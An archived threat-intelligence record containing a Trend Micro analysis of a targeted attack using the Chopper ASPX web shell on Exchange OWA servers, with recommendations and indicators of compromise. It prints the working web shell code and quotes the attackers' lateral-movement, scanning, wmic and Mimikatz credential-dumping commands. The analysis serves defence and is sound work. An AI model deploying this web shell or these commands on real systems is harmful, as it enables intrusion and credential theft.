{
	"id": "be01c695-6065-4680-acf8-3590b9ed952c",
	"created_at": "2026-04-06T00:08:15.111105Z",
	"updated_at": "2026-04-10T03:21:03.171211Z",
	"deleted_at": null,
	"sha1_hash": "60bd0d0b613066d4d4121657b7ccd2711ebcb77e",
	"title": "Chopper ASPX Web Shell Used in Targeted Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 105740,
	"plain_text": "Chopper ASPX Web Shell Used in Targeted Attack\r\nBy Trend Micro ( words)\r\nPublished: 2021-01-29 · Archived: 2026-04-05 21:03:49 UTC\r\nAPT \u0026 Targeted Attacks\r\nWe dissect a targeted attack that made use of the Chopper ASPX web shell (Backdoor.ASP.WEBSHELL.UWMANA).\r\nBy: Trend Micro Jan 29, 2021 Read time: 5 min (1229 words)\r\nSave to Folio\r\nWeb shells, in their simplicity and straightforwardness, are highly potent when it comes to compromising systems and\r\nenvironments. These malicious code pieces can be written in ASP, PHP, and JSP, or any script that can execute a system\r\ncommand with a parameter that can pass through the web. Web shells can be embedded on web servers and can be used by\r\nmalicious actors to launch arbitrary code. In as little as 15 bytes, web shells can enable remote administration of an infected\r\nmachine or system. Threats such as this can be difficult to detect even with multiple security layers — especially if they are\r\nnot consolidated.  \r\nIn this blog, we will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as\r\nBackdoor.ASP.WEBSHELL.UWMANA). \r\nTechnical Analysis\r\nInitial access\r\nBased on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange\r\nServer vulnerability. One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code\r\nexecution bug. Microsoft issued a patch for this vulnerability in  February 2020. However, the malicious actors behind this\r\nattack drop the Chopper web shell in the web directory folder to establish persistence. Through the ASPX file, malicious\r\nactors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands\r\nthrough them.\r\nOutlook Web App (Web Directory)  -  D:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\\premium.aspx\r\nThe attack features the following script:\r\n\u003c%@ Page Language=\"Jscript\" Debug=true%\u003e\r\n\u003c%\r\nvar\r\na=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=\"));\r\nvar b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\"));\r\nvar c=eval(a,b);\r\neval(c,b);\r\n%\u003e\r\nWhen simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the\r\nparameter to be executed:\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Form[\"Command\"],\"unsafe\");%\u003e\r\nWe’ve observed that in some cases, malicious actors insert this short script to avoid detection: \r\nhttps://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html\r\nPage 1 of 5\n\nFigure 1. A short script inserted by malicious actors to avoid detection\r\nUser Activity Checking\r\nOnce Chopper successfully infects a system, the malicious actor will issue a query user (quser) command in an attempt to\r\nidentify the primary user or those who are currently logged in as users in the system. Based on our observation, the quser\r\ncommand was used routinely throughout the attack to determine active remote sessions.  \r\nFigure 2. The quser command is used to identify active remote sessions.\r\nDeobfuscation technique\r\nTo deploy its tools, it uses the expand command to extract package files dropped in the system.\r\nexpand {filename}.ex_ {filename}.dat\r\nexpand {filename}.ex_ {filename}.exe\r\nWe saw a noticeable difference with this attack compared to other Chopper attacks — its use of the .dat file extension, which\r\nis commonly used for data storage purposes, such as in a user profile’s ntuser.dat. In this particular Chopper attack, the .dat\r\nfiles are used as executables.\r\nLateral movement\r\nIt proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.\r\ncopy premium.aspx \"\\\\\r\n{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\r\nIt also scans for vulnerabilities across the network by using an installed tool, Hacktool.Win32.CATLIKE.A, and a legitimate\r\ncURL, C:\\temp\\curl.dat. \r\nIt specifically scans for web server-related vulnerabilities and password weaknesses in Apache Tomcat, Citrix, and\r\nphpMyAdmin applications.\r\nApplication/Port Command\r\nOracle WebLogic\r\ncurl.dat -v -H 'Content-Type: text/xml;charset=UTF-8' http://{ip address\\]:7001/wls-wsat/CoordinatorPortType\r\nOracle Console\r\ncurl.dat -vv http://{ip address}:7001/console/j_security_check  -d j_username=\r\n{username}\u0026j_password={password}\u0026submit=Login\"\r\nhttps://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html\r\nPage 2 of 5\n\nPHPMyAdmin curl.dat -vv --connect-timeout 2 {ip address}/phpmyadmin\r\nApache Tomcat s.dat -u http://{ip address}:8080/manager/html\r\nPorts\r\n7001\r\n9095\r\n5556 \r\n8080\r\ns.dat -i 10.217.229.189 -p {ports}\r\nTable 1. Commands used to scan for web server-related vulnerabilities and passwords on certain applications and ports\r\nWe saw that this attack also uses the WMI command line (wmic) utility to perform remote process execution on other\r\ninfected endpoints.\r\nExecution of arbitrary commands via session id\r\nSuccessful exploitation of CVE-2020-0688 gives Chopper access to system privileges. In one of the endpoints, it will drop\r\nand execute Trojan.Win32.PRIVESC.A. This trojan requires to be run under a user with SeTcbPrivilege. It allows an\r\nattacker to see all Windows sessions and can execute arbitrary commands on the session via session id.\r\nFigure 3. Examples of arbitrary commands being performed on the session via session id\r\nDiscovery\r\nFor its discovery, it uses typical Windows command-line tools such as nltest, ping, whoami,  netstat, net, nslookup,\r\nhostname, and tasklist, which are commonly used in other attacks. In addition, a publicly available JoeWare domain tool\r\ncalled LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.\r\nCredential access\r\nFor obtaining user credentials, the attackers used HackTool.MSIL.Mimikatz.AF, a modified version of the open-sourced\r\napplication Mimikatz, using the following parameters: x, xxx, xxxx, xxxasd.\r\nwmic /node:{ip address} process call create \"cmd.exe /c c:\\users\\mpBD6D42.dat xxxasd -pass \u003e c:\\users\\23.txt \r\nCollection\r\nThe attackers use wevtutil.exe to query security-related events from a target username and export it as a q.txt file. For\r\npackaging stolen credentials and other logs, it uses the makecab command instead of a third-party application such as\r\nrar.exe.\r\n·        makecab a.txt \u003e 111\r\n·        makecab aaa2.txt \u003e1\r\nhttps://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html\r\nPage 3 of 5\n\nThe attacker uses installed security components or applications as filenames to hide in plain sight.\r\n·        C:\\Program Files\\Trend Micro\\ ams p.dat\r\n·        C:\\Oracle\\Oracle.dat\r\n·        C:\\Program Files\\McAfee\\MacAfee.dat\r\nThese suspicious activities were seen via our XDR solution, which helped us monitor observable attack techniques and\r\nprovided critical security alerts including anomalous file extension execution, remote execution via system tools, web shell-related activities, and potential exploit attacks.  \r\nSecurity recommendations\r\nWeb shells can be embedded in systems via security gaps such as vulnerabilities. Attackers will work to identify vulnerable\r\napplications used in systems to exploit them and install web shells for remote code execution or data exfiltration.\r\nWe provide some security recommendations to ensure that enterprises and organizations can defend against web shell\r\nattacks:\r\nPatch your systems and applications. Ensure proper vulnerability patches are applied for public-facing\r\napplications, such as Apache Tomcat, Oracle Web Logic Server, Microsoft Exchange Server, and PHPMyAdmin.\r\nImplement strong passwords. Do not use the same password for multiple applications or websites. Use multi-factor\r\nauthentication whenever possible and regularly update it.\r\nCheck for static keys in the IIS web.config file.  As observed on CVE-2020-0688, the use of static keys — as\r\nopposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into\r\ndeserializing ViewState data.\r\nEnterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation\r\nbased on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats. A\r\nconsolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough\r\ninvestigation and response.   \r\nTrend Micro Solutions\r\nTrend Micro’s comprehensive XDRproducts solution applies the most effective expert analytics to the deep data sets\r\ncollected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and\r\nnetworks — making faster connections to identify and stop attacks. Powerful artificial intelligence (AI) and expert security\r\nanalytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection. One console with one source of prioritized, optimized alerts supported with\r\nguided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.\r\nIndicators of compromise\r\nFilename Path SHA-256 Detection\r\nss.exe C:\\temp\\ ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 HackTool.Win32.CATLIKE.A\r\nLG.exe\r\nC:\\temp\\\r\nC:\\hp\\\r\n5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A.\r\nLG.dat C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A.\r\nhttps://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html\r\nPage 4 of 5\n\nmpBD6D42.dat\r\nC:\\Users\r\nC:\\Perflogs\r\nC:\\hp\r\nC:\\temp\r\ne9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 HackTool.MSIL.Mimikatz.AF\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html\r\nhttps://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html"
	],
	"report_names": [
		"targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434095,
	"ts_updated_at": 1775791263,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/60bd0d0b613066d4d4121657b7ccd2711ebcb77e.pdf",
		"text": "https://archive.orkl.eu/60bd0d0b613066d4d4121657b7ccd2711ebcb77e.txt",
		"img": "https://archive.orkl.eu/60bd0d0b613066d4d4121657b7ccd2711ebcb77e.jpg"
	}
}